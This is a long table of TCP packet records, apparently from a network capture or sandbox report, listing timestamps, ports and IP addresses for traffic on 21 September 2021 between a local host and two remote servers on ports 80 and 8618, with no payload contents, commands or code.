Sep 21, 2021 21:34:35.244537115 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244539022 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244559050 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244571924 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.244579077 CEST	80	49742	192.210.214.221	192.168.2.3
Sep 21, 2021 21:34:35.244620085 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.309156895 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:35.317873955 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:34:37.883068085 CEST	49742	80	192.168.2.3	192.210.214.221
Sep 21, 2021 21:35:17.685204983 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:17.827152014 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:17.830169916 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:17.849181890 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:18.022156954 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.064268112 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:18.202229023 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.217031002 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:18.438600063 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.438755989 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:18.619847059 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.849071026 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.851761103 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:18.989420891 CEST	8618	49788	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:18.997404099 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.001010895 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.030309916 CEST	49788	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.137178898 CEST	8618	49789	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:19.137362003 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.139659882 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:19.139784098 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.169272900 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.170641899 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.328398943 CEST	8618	49789	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:19.358431101 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:19.370354891 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.509134054 CEST	8618	49789	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:19.555167913 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.953214884 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:19.958138943 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:20.097455978 CEST	8618	49789	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:20.134835005 CEST	8618	49789	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:20.134918928 CEST	49789	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:20.189155102 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:20.231450081 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:20.370094061 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:20.416450024 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:20.557842970 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:20.747078896 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:20.900600910 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.088915110 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.089020967 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.236664057 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236695051 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236715078 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236732006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236747980 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236764908 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236764908 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.236782074 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236789942 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.236797094 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236810923 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.236816883 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236831903 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.236838102 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.236885071 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376384974 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376419067 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376439095 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376447916 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376461029 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376481056 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376498938 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376507044 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376514912 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376532078 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376554966 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376583099 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376683950 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376701117 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376741886 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376842022 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376859903 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376876116 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376893044 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376892090 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376916885 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.376926899 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.376975060 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.377073050 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.377454042 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.377475023 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.377494097 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.377513885 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.377547979 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.516158104 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516191959 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516208887 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516292095 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.516424894 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516462088 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516480923 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516522884 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.516557932 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.516908884 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516928911 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516944885 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.516963959 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517034054 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517052889 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517513990 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517534971 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517596006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517605066 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517616034 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517635107 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517652988 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517688990 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517712116 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517760038 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517781019 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517813921 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517853022 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.517939091 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517957926 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.517999887 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.518182993 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518217087 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518238068 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.518383026 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518452883 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.518656015 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518676043 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518692970 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518709898 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518727064 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518743992 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518760920 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518769979 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.518774986 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518811941 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.518877983 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.518985033 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519036055 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.519052029 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519220114 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519238949 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519256115 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519290924 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519304991 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519315004 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.519341946 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.519365072 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.559477091 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.654527903 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.654788971 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.654825926 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.654887915 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.655004025 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.655019045 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.655045033 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.655069113 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.655085087 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.655134916 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.656430006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.656533957 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657018900 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657048941 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657115936 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657139063 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657162905 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657501936 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657509089 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657525063 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657530069 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657557964 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657602072 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657613039 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657633066 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657655954 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.657665968 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657766104 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.657939911 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658006907 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658063889 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658086061 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658186913 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658190966 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658390999 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658452988 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658469915 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658473015 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658487082 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658531904 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658556938 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658580065 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658598900 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658602953 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658646107 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658814907 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658832073 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.658881903 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.658998013 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.659707069 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660233974 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660239935 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660363913 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660387039 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660401106 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660418034 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660428047 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660469055 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660491943 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660495043 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660537004 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660538912 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660576105 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660578012 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660620928 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660656929 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660672903 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660686016 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660698891 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.660718918 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.660753012 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.697696924 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.740500927 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.794492006 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795542002 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795552969 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795555115 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795557976 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795558929 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795561075 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795562983 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.795694113 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.796683073 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.796782970 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.796786070 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.796787977 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.796789885 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.796905994 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.797019005 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.797044039 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.797086954 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.797102928 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.797111988 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.797166109 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.799274921 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.799285889 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.799307108 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.799324989 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.800781965 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.800930023 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.800978899 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.807461023 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.807606936 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807637930 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807662964 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807686090 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807709932 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807734013 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807758093 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807780981 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807804108 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807831049 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807859898 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807883978 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807909012 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807933092 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807955980 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.807981968 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808003902 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808031082 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808054924 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808078051 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808101892 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808125973 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808149099 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808173895 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808198929 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.808551073 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.878305912 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.919512987 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.934499025 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934530973 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934544086 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934556961 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934571028 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934587002 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934602976 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934622049 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.934650898 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.934721947 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.937903881 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.937928915 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.937942028 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.937962055 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938014030 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938025951 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.938061953 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.938101053 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938119888 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938137054 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938157082 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.938167095 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.938199043 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.949455023 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949482918 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949500084 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949517012 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949532986 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949589014 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.949619055 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.949892044 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949912071 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949928045 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949944019 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949959993 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949965000 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.949978113 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.949994087 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950012922 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950016022 CEST	49790	8618	192.168.2.3	31.3.152.100
Sep 21, 2021 21:35:21.950031996 CEST	8618	49790	31.3.152.100	192.168.2.3
Sep 21, 2021 21:35:21.950048923 CEST	8618	49790	31.3.152.100	192.168.2.3
